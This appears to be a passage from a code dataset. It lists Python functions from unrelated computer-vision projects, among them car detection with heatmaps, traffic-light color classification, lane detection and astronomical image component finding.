np.dstack((acc_heatmap, acc_heatmap, acc_heatmap))\n labels = np.clip(heatmap, 0, 1)*255\n labels = np.dstack((labels, labels, labels))\n final = draw_boxes(img, bboxes)\n frame = np.concatenate((np.concatenate((single_heatmap, acc_heatmap), axis=1),\n np.concatenate((labels, final), axis=1)), axis=0)\n return cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n else:\n return draw_boxes(img, bboxes)", "def process_frame(self, img):\n if self.heatmap is None:\n self.heatmap = np.zeros((img.shape[0], img.shape[1], self.n_frames), dtype=np.float32)\n\n img_blur = gaussian_blur(np.copy(img), 3)\n heat = detect_cars_multi_area(img_blur, self.clf, self.xy_window, self.stride, self.y_start_stops,\n self.image_size_factors, self.x_padding, heatmap=True, n_jobs=self.n_jobs)\n\n heat = gaussian_blur(heat, 21)\n self.heatmap[:, :, self.frame_cnt % self.n_frames] = heat\n\n if self.frame_cnt < self.n_frames:\n heat = np.mean(self.heatmap[:, :, :self.frame_cnt], axis=2)\n else:\n heat = np.mean(self.heatmap, axis=2)\n\n heat_thresh = np.zeros(heat.shape, dtype=np.uint8)\n heat_thresh[heat > self.heatmap_thresh] = 255\n\n boxes_contours = bb_by_contours(heat_thresh)\n boxes_contours = self._remove_outliers(boxes_contours)\n\n used_boxes = self._update_detections(boxes_contours)\n\n self._unhide_if_applicable(boxes_contours, used_boxes)\n\n self._create_new_detections(boxes_contours, used_boxes)\n\n self._remove_lost_detections()\n if self.auto_draw:\n img = self.draw_info(img)\n self.frame_cnt += 1\n\n return img", "def process_image(self, img):\n show = False\n # draw_image = np.copy(img)\n # search all scale windows and return cars' windows\n hots = search_scales(img,self.svc, self.X_scaler, self.orient, \n self.pix_per_cell, self.cell_per_block, self.spatial_size, self.hist_bins)\n # update the self boxes\n self.update(hots)\n # detect cars using threshold\n window_image = self.detect(img, 2)\n if show:\n plt.imshow(window_image)\n plt.show()\n return window_image", "def extract_vehicles(self):\n heatmap_threshed = apply_threshold(self.avg_heatmap, 7)\n\n labels = label(heatmap_threshed)\n self.binary_map = labels[0]\n self.number_of_found_cars = labels[1]", "def find_cars_image(image, clf, hyperparams, box_color=None, old_heatmap=None):\n heat_threshold = hyperparams[\"HEAT_THRESHOLD\"]\n # Scan the image and get the new heatmap\n _, heatmap = scan_multiple_win_sizes(image, clf, hyperparams, box_colors=None)\n # Build an aggregated heatmap of this heatmap and the old heatmap\n agg_heatmap = old_heatmap+heatmap if old_heatmap is not None else heatmap\n # Apply threshold to find cars\n thresh_heatmap = apply_threshold(agg_heatmap, heat_threshold)\n # Label cars\n labels_heatmap, n_cars = label(thresh_heatmap)\n # Draw labeled boxes and get bounding boxes\n draw_image, bboxes = draw_labeled_bboxes(np.zeros_like(image), labels_heatmap, n_cars, box_color=box_color)\n # Return values\n return bboxes, draw_image, labels_heatmap, heatmap, agg_heatmap", "def process_image(img):\n avg_heat = np.zeros_like(image[:, :, 0]).astype(np.float)\n out_img, out_boxes, heat_map = find_cars(img, scale)\n\n # -----\n heat = np.zeros_like(image[:, :, 0]).astype(np.float)\n # Add heat to each box in box list\n heat = add_heat(heat, out_boxes)\n\n # Apply threshold to help remove false positives\n heat = apply_threshold(heat, 1)\n # heat = apply_threshold(heat, 2)\n\n avg_heat = cv2.addWeighted(avg_heat, 0.8, heat, 0.2, 0.)\n\n # Apply threshold to help remove near-zero noise\n heatmap = 
apply_threshold(cv2.blur(avg_heat, (15, 15)), 0.5)\n\n # Visualize the heatmap when displaying\n heatmap = np.clip(heatmap, 0, 255) # limit the values in the heatmap array\n\n # -----\n # Find final boxes from heatmap using label function\n labels = label(heat_map)\n # Draw bounding boxes on a copy of the image\n output_img = draw_labeled_bboxes(np.copy(img), labels)\n\n # -----\n r = 377.0 / avg_heat.shape[1] # calculate height\n dim = (377, int(avg_heat.shape[0] * r)) # width, height\n resized = cv2.resize(avg_heat, dim, interpolation=cv2.INTER_AREA)\n # add to output_img\n output_img[0:0 + resized.shape[0], 0:0 + resized.shape[1]] = np.repeat(resized[:, :, np.newaxis], 3,\n axis=2) * 255\n output_img = cv2.putText(output_img, \"Heatmap\", (34, 34), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2,\n cv2.LINE_AA)\n\n # -----\n return output_img", "def process_image(img, debug=True):\n global X_scaler, svc, feature, heatmap\n\n global top_left_x, top_left_y, bottom_right_x, bottom_right_y\n global start_win_width, start_win_height, end_win_width, end_win_height\n global overlap_frac_x, overlap_frac_y, layer\n\n out_img = np.copy(img)\n\n # When training the model, the images are loaded by cv2 => BGR (they might be converted later, though)\n # Since moviepy read images as RGB, we need to convert them to BGR first\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n windows = get_windows(img,\n x_start_stop=[top_left_x, bottom_right_x],\n y_start_stop=[top_left_y, bottom_right_y],\n overlap=(overlap_frac_x, overlap_frac_y),\n window_start_size=(start_win_width, start_win_height),\n window_end_size=(end_win_width, end_win_height),\n layers=layer)\n\n car_windows = []\n for window in windows:\n # Extract bounding box image from frame\n cropped_img = get_image_region(img, bbox=window)\n\n # Get feature vector\n feature_vector = feature.extract(cropped_img).astype(np.float64)\n\n # Normalize vector\n scaled_feature_vetor = X_scaler.transform(feature_vector)\n\n # Make prediction\n pred = svc.predict(scaled_feature_vetor)\n\n # If pred[0] == 1. 
then a car was detected\n if pred[0] == 1.:\n car_windows.append(window)\n\n # Add heat to heatmap where cars were detected\n heatmap.add_heat(car_windows)\n\n # Get labels from heatmap\n l = heatmap.get_labels()\n\n # Create image with all detected labels (post-heatmap)\n label_img = draw_labeled_bboxes(out_img, l)\n\n if debug:\n print('cars found: {}'.format(l[1]))\n\n # Create image with all detected cars (pre-heatmap)\n box_img = draw_boxes(out_img, car_windows)\n\n # Create image that is an average of the last frames heatmap\n last_heatmaps_img = heatmap.last_maps_average()\n\n # Reduce size to 1/3\n small_last_heatmaps_img = cv2.resize(last_heatmaps_img,\n (last_heatmaps_img.shape[1]//3, last_heatmaps_img.shape[0]//3))\n small_current_heatmap_img = cv2.resize(heatmap.current_map, (heatmap.shape[1]//3, heatmap.shape[0]//3))\n small_box_img = cv2.resize(box_img, (box_img.shape[1]//3, box_img.shape[0]//3))\n\n # Create debug view\n right_img = np.vstack((small_last_heatmaps_img, small_current_heatmap_img, small_box_img))\n\n # Add debug view to video\n out_img = np.hstack((label_img,\n right_img))\n else:\n out_img = np.copy(label_img)\n\n # Move current heatmap to archive, create new map for next frame\n heatmap.next_map()\n\n return out_img", "def predict_crashes_with_tracking_visualization(images, carpoints, centered):\n images = images.copy()\n lh = 5\n # plot 5 frames forward\n # check size of the cars to indicate depth\n color = (0, 255, 255)\n wh = [(x[2] - x[0], x[3] - x[1]) for x in carpoints[0]]\n for i in range(len(centered)):\n look_ahead = [[(0, 0) for i in range(len(centered[i]))] for j in range(lh + 1)]\n\n if i in [0]: continue\n\n dxs = [0 for i in range(len(centered[i]))]\n dys = [0 for i in range(len(centered[i]))]\n\n for j in range(len(centered[i])):\n dxs[j] = centered[i][j][0] - centered[i - 1][j][0]\n dys[j] = centered[i][j][1] - centered[i - 1][j][1]\n\n look_ahead[0] = centered[i]\n for j in range(1, lh + 1):\n for k in range(len(centered[i])):\n xc = look_ahead[j - 1][k][0] + dxs[k] * 2\n yc = look_ahead[j - 1][k][1] + dys[k] * 2\n look_ahead[j][k] = (xc, yc)\n # print(look_ahead[j][k])\n curr_image = images[i]\n w, h = wh[k]\n cv2.rectangle(curr_image, (int(xc - w / 2), int(yc - h / 2)), (int(xc + w / 2), int(yc + h / 2)), color,\n 2)\n images[i] = curr_image\n\n for j in range(1, lh + 1):\n min_cars = (0, 0)\n min_dist = 500000000\n wh_ind = (0, 0)\n for k in range(0, len(look_ahead[j]) - 1):\n for l in range(k + 1, len(look_ahead[j])):\n x1, y1 = look_ahead[j][k]\n x2, y2 = look_ahead[j][l]\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if dist < min_dist:\n min_dist = dist\n min_cars = (x1, y1, x2, y2)\n wh_ind = (k, l)\n\n x1, y1, x2, y2 = min_cars\n w1, h1 = wh[wh_ind[0]]\n w2, h2 = wh[wh_ind[1]]\n curr_image = images[i]\n cv2.rectangle(curr_image, (int(x1 - w1 / 2), int(y1 - h1 / 2)), (int(x1 + w1 / 2), int(y1 + h1 / 2)),\n (255, 255, 0),\n 2)\n cv2.rectangle(curr_image, (int(x2 - w2 / 2), int(y2 - h2 / 2)), (int(x2 + w2 / 2), int(y2 + h2 / 2)),\n (255, 255, 0),\n 2)\n images[i] = curr_image\n\n return images", "def find_tfl_lights(image: np.ndarray):\n kernel = np.array(\n [[0, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [1, 3, 1],\n [0, 1, 0]])\n\n kernel = kernel - kernel.mean()\n\n red_image = image.copy()\n red_image = red_image[:, :, 0]\n _, red_image = cv2.threshold(red_image, 200, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(red_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = 
output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n red_points = np.where(mask)\n positions = []\n final_red_points = []\n for point1 in range(len(red_points[0])):\n point = (red_points[0][point1], red_points[1][point1])\n pixel = image[point[0], point[1]]\n if (pixel[1] < 170 or pixel[2] < 120) and pixel[0] >= 200:\n final_red_points.append(point)\n final_red_points = filter_points(final_red_points)\n positions += final_red_points\n auxilary = ['r'] * len(positions)\n red_x = [val[1] for val in final_red_points]\n red_y = [val[0] for val in final_red_points]\n green_image = image.copy()\n green_image = green_image[:, :, 1]\n _, green_image = cv2.threshold(green_image, 190, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(green_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n green_points = np.where(mask)\n final_green_points = []\n for point1 in range(len(green_points[0])):\n point = (green_points[0][point1], green_points[1][point1])\n pixel = image[point[0], point[1]]\n if pixel[0] <= 180 and pixel[1] >= 220 and pixel[2] >= 160:\n final_green_points.append(point)\n\n final_green_points = filter_points(final_green_points)\n positions += final_green_points\n auxilary += ['g'] * len(final_green_points)\n green_x = [val[1] for val in final_green_points]\n green_y = [val[0] for val in final_green_points]\n print(f\"There are {len(green_x) + len(red_x)} points\")\n return positions, auxilary", "def get_classification(self, image):\n\n temp = cv2.cvtColor(cv2.GaussianBlur(image,(5,5),0), cv2.COLOR_BGR2HSV)\n\n maskR = cv2.inRange(temp, np.array([0, 195, 240]), np.array([5, 215, 255]))\n maskY = cv2.inRange(temp, np.array([28, 195, 240]), np.array([35, 215, 255]))\n maskG = cv2.inRange(temp, np.array([60, 195, 240]), np.array([67, 215, 255]))\n\n filt_r = cv2.bitwise_and(temp,temp, mask= maskR)\n filt_y = cv2.bitwise_and(temp,temp, mask= maskY)\n filt_g = cv2.bitwise_and(temp,temp, mask= maskG)\n\n # Bitwise-AND mask and original image\n self.debug_im1 = filt_r\n self.debug_im2 = filt_y\n self.debug_im3 = filt_g\n status = TrafficLight.UNKNOWN\n\n if np.sum(maskR>10):\n print('detected red')\n status = TrafficLight.RED\n elif np.sum(maskY>10):\n print('detected yellow')\n status = TrafficLight.YELLOW\n elif np.sum(maskG>10):\n print('detected green')\n status = TrafficLight.GREEN\n\n # self.debug()\n return status", "def car_zones(self, image, Hp):\n # 1) Load data from the object\n windows_feat = self.sampling_data\n clf = self.clf\n scaler = self.scaler\n overlap = self.overlap\n color_space = self.color_space\n spatial_size = self.spatial_size\n hist_bins = self.hist_bins\n orient = self.orient\n pix_per_cell = self.pix_per_cell\n cell_per_block = self.cell_per_block\n hog_channel = self.hog_channel \n spatial_feat = self.spatial_feat\n hist_feat = self.hist_feat \n hog_feat = self.hog_feat\n \n # 2) Create a copy of the image\n cimage = np.copy (image)\n # 3) Create a empty list where to store the detected windows\n detected_windows_list = []\n # 4) Loop into the windows \n for window_feat in windows_feat:\n # 4.1) Get the window using sliding_window\n windows = slide_window(image, x_start_stop=window_feat[0],\n y_start_stop=window_feat[1], \n xy_window=window_feat[2], \n xy_overlap=overlap)\n # 4.2) Get the local probabilities\n hp, hot_windows = search_windows(cimage, windows, clf, scaler, color_space=color_space, \n spatial_size=spatial_size, 
hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n # 4.3) Store the probabilities into the Hp matrix\n Hp = add_probabilities(Hp, hp, windows)\n # 4.4) Store the detected boxes into the list\n detected_windows_list.extend(hot_windows)\n \n # 5) Return the detected windows and the probability matrix (Hp)\n return detected_windows_list, Hp", "def process_image(self, image, debug=False):\n # Get old heatmap from internal deque representation or initialize with zeros if unknown\n old_heatmap = np.zeros(image.shape[0:2]) if len(self.heatmap_deque) == 0 else sum(self.heatmap_deque)\n # Scale image from 0.0..1.0\n modified_image = np.copy(image)/255.\n # Find cars in image\n _, draw_image, labels_heatmap, new_heatmap, agg_heatmap = find_cars_image(modified_image, self.clf,\n self.hyperparams, self.box_color, old_heatmap=old_heatmap)\n # Overlay bounding boxes on top of image\n draw_image[(draw_image == 0).all(2)] = modified_image[(draw_image == 0).all(2)]\n # Add new heatmap to deque\n self.heatmap_deque.append(new_heatmap)\n # In debug mode ...\n if debug:\n # ... create a new canvas\n result_image = np.zeros_like(image).astype(float)\n h = result_image.shape[0]\n w = result_image.shape[1]\n # get the new heatmap and aggregated heatmap as \"fancy heatmap\" representation\n new_heatmap_rgb = fancy_heatmap(new_heatmap, self.hyperparams[\"HEAT_THRESHOLD\"])\n agg_heatmap_rgb = fancy_heatmap(agg_heatmap, self.hyperparams[\"HEAT_THRESHOLD\"])\n # labels_heatmap_rgb will just be the grayscale value scaled to 0..1 and replicated across all 3 channels\n labels_heatmap_rgb = cv2.merge([normalize(labels_heatmap, norm='max')]*3)\n # place all the different images into their respective quadrant of the output canvas\n result_image[0:h//2, 0:w//2] = cv2.resize(draw_image, (w//2, h//2), interpolation=cv2.INTER_AREA)\n result_image[h//2:h, 0:w//2] = cv2.resize(labels_heatmap_rgb, (w//2, h-h//2), interpolation=cv2.INTER_AREA)\n result_image[0:h//2, w//2:w] = cv2.resize(new_heatmap_rgb, (w-w//2, h//2), interpolation=cv2.INTER_AREA)\n result_image[h//2:h, w//2:w] = cv2.resize(agg_heatmap_rgb, (w-w//2, h-h//2), interpolation=cv2.INTER_AREA)\n # rescale result to 0..255\n result_image = (result_image*255).astype(int)\n else:\n # For non-debug mode, just take scaled-back the find_cars draw_image return value\n result_image = (draw_image*255).astype(int)\n return result_image", "def detect(self, img):\n # 1. color filter\n lane_img = self.color_filter(img.copy())\n # 2. gaussian blur\n lane_img = self.gaussian_blur(lane_img)\n # 3.canny edge detection\n lane_img = self.canny(lane_img)\n # 4. region of interest crop\n lane_img = self.region_of_interest(lane_img)\n # 5. hough lines\n lane_img = self.hough_lines(lane_img)\n # 6. 
overlay lane over original image\n result_img = weighted_img(lane_img, img)\n\n return result_img", "def get_classification(self, cv2_image):\n def get_green_mask(img_hsv):\n lower_green = np.array([40, 10, 10])\n upper_green = np.array([90, 255, 255])\n mask = cv2.inRange(img_hsv, lower_green, upper_green)\n return mask\n\n def get_red_mask(img_hsv):\n # red lower mask (0-10)\n lower_red = np.array([20, 1, 150])\n upper_red = np.array([30, 120, 255])\n mask0 = cv2.inRange(img_hsv, lower_red, upper_red)\n\n # Red upper mask\n lower_red = np.array([170, 50, 50])\n upper_red = np.array([180, 255, 255])\n mask1 = cv2.inRange(img_hsv, lower_red, upper_red)\n\n # join my masks\n mask = mask0 + mask1\n return mask\n\n def get_traffic_light_color(cv2_image):\n # Convert BGR to HSV\n img_hsv = cv2.cvtColor(cv2_image, cv2.COLOR_BGR2HSV)\n height, width, _ = img_hsv.shape\n\n green_mask = get_green_mask(img_hsv)\n red_mask = get_red_mask(img_hsv)\n\n dico = {\n TrafficLight.RED: np.count_nonzero(red_mask[0:int(height / 3), :]),\n TrafficLight.YELLOW: np.count_nonzero(red_mask[int(height / 3):int(height * 2 / 3), :]),\n TrafficLight.GREEN: np.count_nonzero(green_mask[int(height * 2 / 3):height, :])\n }\n\n v = list(dico.values())\n k = list(dico.keys())\n return k[v.index(max(v))]\n\n output_dict = self.run_inference_for_single_image(cv2_image)\n traffic_light_image = self.get_traffic_light(cv2_image, output_dict)\n\n # no traffic light found\n if traffic_light_image is None:\n return TrafficLight.UNKNOWN\n\n return get_traffic_light_color(traffic_light_image)", "def find_tfl_lights(c_image: np.ndarray):\n red_img = c_image[:, :, 0]\n green_img = c_image[:, :, 1]\n new_red = convolution(red_img)\n new_green = convolution(green_img)\n x_red, y_red = get_max_candidate(new_red)\n x_green, y_green = get_max_candidate(new_green)\n return x_red, y_red, x_green, y_green", "def identify_dbs(image):\n locations = {\"red\": Point(), \"green\": Point(), \"blue\": Point()}\n masks = {\"red\": [], \"green\": [], \"blue\": []}\n\n bridge = cv_bridge.CvBridge()\n image = bridge.imgmsg_to_cv2(image, \"bgr8\")\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # upper and lower bounds for red\n # using python 3 bgr [0,0,188] = hsv [0, 255, 188]\n lower_red = numpy.array([0, 100, 100]) \n upper_red = numpy.array([10, 255, 255])\n masks[\"red\"] = cv2.inRange(hsv, lower_red, upper_red)\n\n # upper and lower bounds for green\n # using python 3 bgr [0,175,0] = hsv [60, 255, 175]\n lower_green = numpy.array([50, 100, 100]) \n upper_green = numpy.array([70, 255, 255])\n masks[\"green\"] = cv2.inRange(hsv, lower_green, upper_green)\n\n # upper and lower bounds for blue\n # using python 3 bgr [176, 0, 17] = hsv [123, 255, 176]\n lower_blue = numpy.array([113, 100, 100])\n upper_blue = numpy.array([133, 255, 255])\n masks[\"blue\"] = cv2.inRange(hsv, lower_blue, upper_blue)\n\n x, y, w, h = 0, 0, image.shape[1]//3, image.shape[0]\n\n for color, mask in masks.items():\n pixels = {\"left\": 0, \"middle\": 0, \"right\": 0}\n \n # define section of image to use for left, middle and right\n left = mask[y:y+h, x:x+w]\n middle = mask[y:y+h, x+w:x+w+w]\n right = mask[y:y+h, x+w+w:x+3*w]\n\n # count the number of pixels in each section\n pixels[\"left\"] = cv2.countNonZero(left)\n pixels[\"middle\"] = cv2.countNonZero(middle)\n pixels[\"right\"] = cv2.countNonZero(right)\n location = max(pixels, key=pixels.get)\n\n # map the relative position of the db (left, middle, right) to the correct Point()\n locations[color] = 
db_locations[location]\n \n return locations", "def detect_cars(img, clf, xy_window, stride, cur_sizes_factors, cur_y_start_stop, cur_x_padding):\n\n image_tar_size = (int(img.shape[0] * cur_sizes_factors),\n int(img.shape[1] * cur_sizes_factors))\n\n # open cv needs the shape in reversed order (width, height)\n img_scaled = cv2.resize(img, image_tar_size[::-1])\n # check if search area is smaller than window.\n cur_y_start_stop = (cur_y_start_stop * cur_sizes_factors).astype(np.uint32)\n\n # if the window size is bigger than the search area return an empty array\n search_area_height = cur_y_start_stop[1] - cur_y_start_stop[0]\n if search_area_height < xy_window[1] or img_scaled.shape[1] < xy_window[0]:\n return np.ndarray((0, 4))\n\n # Add padding (zeros) on the x axis\n img_scaled = add_padding(img_scaled, cur_x_padding)\n windows = slide_window(img_scaled, y_start_stop=cur_y_start_stop, xy_window=xy_window,\n stride=stride)\n\n features = extract_features(img_scaled, clf, windows, cur_y_start_stop, xy_window, stride)\n des_func = clf.named_steps['clf'].decision_function(features)\n\n windows = remove_padding_from_bb(windows, cur_x_padding)\n # windows have to be rescaled to account for the resized image\n windows = (windows / cur_sizes_factors).astype(np.uint32)\n windows = windows[des_func > 0]\n\n des_func = des_func[des_func > 0]\n\n return windows, des_func", "def find_gate_posts(img, display_results=False):\n\n greyscale_image = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_GRAY2BGR)\n cm_image = cv2.applyColorMap(greyscale_image, cv2.COLORMAP_VIRIDIS)\n\n kernel = np.ones((5, 5), np.uint8)\n\n # cm_image = cv2.erode(cm_image, kernel, iterations=1)\n kernel = np.ones((5, 5), np.uint8)\n cm_image = cv2.dilate(cm_image, kernel, iterations=3)\n kernel = np.ones((4, 4), np.uint8)\n cm_image = cv2.erode(cm_image, kernel, iterations=1)\n\n cm_image = cv2.medianBlur(cm_image, 5) # Removes salt and pepper noise\n\n cm_copy_image = cm_image\n cv2.copyTo(cm_image, cm_copy_image)\n\n mask = mask_sonar_image(cm_image, display_results)\n\n cm_circles = cv2.findContours(mask, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n cm_circles = list(filter(lambda x: (cv2.contourArea(x) > 200\n and cv2.contourArea(x) < 5000),\n cm_circles))\n cm_circles = sorted(cm_circles,\n key=lambda x: (arc_circ(x)),\n reverse=False)\n\n cm_circles = list(filter(lambda x: (cv2.arcLength(x, True)**2/(4\n * math.pi*cv2.contourArea(x)) > 2.5), cm_circles))\n\n if len(cm_circles) < 1:\n print(\"Not enough circles found\")\n return None\n\n filtered_circles = cm_circles[0:1]\n\n circle_positions = []\n for circle in filtered_circles: # find center of circle code\n M = cv2.moments(circle)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n circle_positions.append((cX, cY, arc_circ(circle), cv2.arcLength(\n circle, True)**2/(4*math.pi*cv2.contourArea(circle))))\n\n if display_results:\n cv2.drawContours(cm_copy_image, filtered_circles, -1, (0, 255, 0), 2)\n cv2.imshow(\"found_gate_posts\", cm_copy_image)\n cv2.waitKey(0)\n\n return circle_positions", "def vision(image):\n vis_map = resize(image, alpha, beta)\n print(\"Resized map from the blue mask\")\n\n world = rotate(vis_map)\n\n plt.figure()\n plt.imshow(world[:, :, ::-1])\n plt.show()\n object_grid, occupancy_grid = detect_object(world)\n print(\"Result of the red mask\")\n plt.figure()\n plt.imshow(occupancy_grid)\n plt.show()\n return object_grid, occupancy_grid, world", "def get_classification_simulator(self, image):\n\n r_channel = 
image[:,:,2]\n g_channel = image[:,:,1]\n\n\n\n # Threshold color channel\n s_rgy_min = 50\n s_thresh_min = 245\n s_thresh_max = 255\n \n #s_binary = np.zeros_like(r_channel)\n r_binary = np.zeros_like(r_channel)\n g_binary = np.zeros_like(r_channel)\n y_binary = np.zeros_like(r_channel)\n \n #s_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) | ((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max))] = 1\n \n \n r_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) & (g_channel <= s_rgy_min)] = 1\n g_binary[((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max)) & (r_channel <= s_rgy_min)] = 1\n y_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) & ((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max))] = 1\n \n\n #res = cv2.bitwise_and(img,img,mask = s_binary)\n \n #maxx=image.shape[1]\n maxy=image.shape[0]\n \n y_top=0\n window_size_y=50\n y_bottom=y_top+window_size_y\n \n max_color=0\n tf_color=TrafficLight.UNKNOWN\n \n while (y_bottom< maxy):\n #print(img[y_top:y_bottom,:,:])\n rs= r_binary[y_top:y_bottom,:].sum()\n gs= g_binary[y_top:y_bottom,:].sum()\n ys= y_binary[y_top:y_bottom,:].sum()\n if (rs>max_color):\n max_color=rs\n tf_color=TrafficLight.RED\n if (gs>max_color):\n max_color=gs\n tf_color=TrafficLight.GREEN\n if (ys>max_color):\n max_color=ys\n tf_color=TrafficLight.YELLOW\n y_top+=window_size_y\n y_bottom+=window_size_y\n \n if (max_color<100):\n tf_color=TrafficLight.UNKNOWN\n \n\n\n return tf_color", "def find_components(image,deltaPix,lens_rad_arcsec = 6.0,lens_rad_ratio = None,\n center_x = None,center_y = None, gal_rad_ratio = 0.1,\n min_size_arcsec=0.7,thresh=0.5, many_sources = True,\n show_locations=False, title = None):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n \n# im2[im2 < im2.min() + 10.*thresh] = 0.\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n LoG = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.) 
\n \n# LoG = - gaussian_laplace(deepcopy(im2), sigma = 2., mode='constant', cval=0.)\n \n filtered = deepcopy(LoG)\n \n# print(LoG.min(),LoG.max(),np.abs(LoG.min()) + thresh )\n \n# print(type(filtered))\n \n #background mean and std of filtered image \n corners = np.zeros([4,5,5])\n corners[0] = LoG[0:5,0:5]\n corners[1] = LoG[-5:,0:5]\n corners[2] = LoG[0:5,-5:]\n corners[3] = LoG[-5:,-5:]\n means = []\n stds = []\n for c in corners:\n mn,med,s = sigma_clipped_stats(c,sigma=3.0)\n means.append(mn)\n stds.append(s)\n \n stds=np.array(stds)\n means = np.array(means)\n means_std = np.std(means)\n# means_good = means[(means >= means.mean() - 1.0 * means_std) & (means <= means.mean() + 1.0 * means_std)]\n means_good = means[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)]\n mean_bg = np.mean(means_good)\n std_bg = np.mean(stds[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)])\n# print('LoG means: {}, Log means std: {}, Log means good: {}, LoG avg mean: {}'.format(means,means_std,means_good,mean_bg))\n# print('min: {}, max: {}, cut: {}'.format(LoG.min(),LoG.max(),mean_bg + thresh))\n# print(LoG.min(),LoG.max(),filtered.min() + thresh)\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n# filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n# filtered[filtered < mean_bg + thresh] = 0.\n filtered[filtered < mean_bg + 6.*std_bg] = 0. #set pixels below the mean + 6x threshold to 0\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0) #All bright pixels\n max_idx_2d_large = peak_local_max(filtered, min_distance=1) #peaks with min size of 1 pixel\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2. 
#center of image\n \n if (center_x == None) & (center_y == None):\n new_center_x, new_center_y = im_center_x,im_center_y\n else:\n new_center_x, new_center_y = center_x,center_y #new \"center\" = location of lens galaxy\n \n \n #distance of each detected peak from center\n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2) \n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n #Contaminant light is only bright pixels further from center than lens_rad\n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n if many_sources:\n x_lens, y_lens = deepcopy(x_list_small), deepcopy(y_list_small)\n else:\n x_lens, y_lens = deepcopy(x_list_large), deepcopy(y_list_large)\n \n# x_lens, y_lens = x_list_small[R_small <= lens_rad], y_list_small[R_small <= lens_rad]\n \n if (len(x_lens) == 0) & (len(y_lens) == 0):\n x_lens = [0,15]\n y_lens = [0,15]\n \n sources = QTable([x_lens, y_lens],names={'x_local_peak','y_local_peak'}) #make table of all detected objects\n# print(x_list_large)\n# print(y_list_large)\n# print(sources)\n \n # show maxima on image for debug\n \n if show_locations:\n# fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n \n f, axes = plt.subplots(1, 5, figsize=(20,5), sharex=False, sharey=False)\n# plt.figure(figsize = (8,8))\n# plt.subplot(1,2,1)\n \n axes[0].imshow(image, origin='lower', norm=SymLogNorm(5))\n axes[0].set_title('Image')\n axes[0].set_axis_off()\n \n \n axes[1].imshow(LoG, origin='lower', norm=SymLogNorm(5))\n axes[1].set_title('LoG Filtered Image')\n axes[1].set_axis_off()\n\n# plt.subplot(1,2,2)\n axes[2].imshow(filtered, origin='lower', norm=SymLogNorm(5))\n axes[2].set_title('Final Filtered Image')\n axes[2].set_axis_off()\n \n axes[3].imshow(image, origin='lower', norm=SymLogNorm(5))\n for i in range(len(x_lens)):\n axes[3].scatter([x_lens[i]], [y_lens[i]], c='red', s=60, marker='+')\n \n for i in range(len(x_list_large)):\n axes[3].scatter([x_list_large[i]], [y_list_large[i]], c='black', s=100, marker='x')\n axes[3].set_title('Detected Objects')\n axes[3].set_axis_off()\n \n axes[4].imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n axes[4].scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n \n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n axes[4].scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n# plt.gcf().gca().add_artist(draw_lens_circle)\n# plt.gcf().gca().add_artist(draw_gal_circle)\n 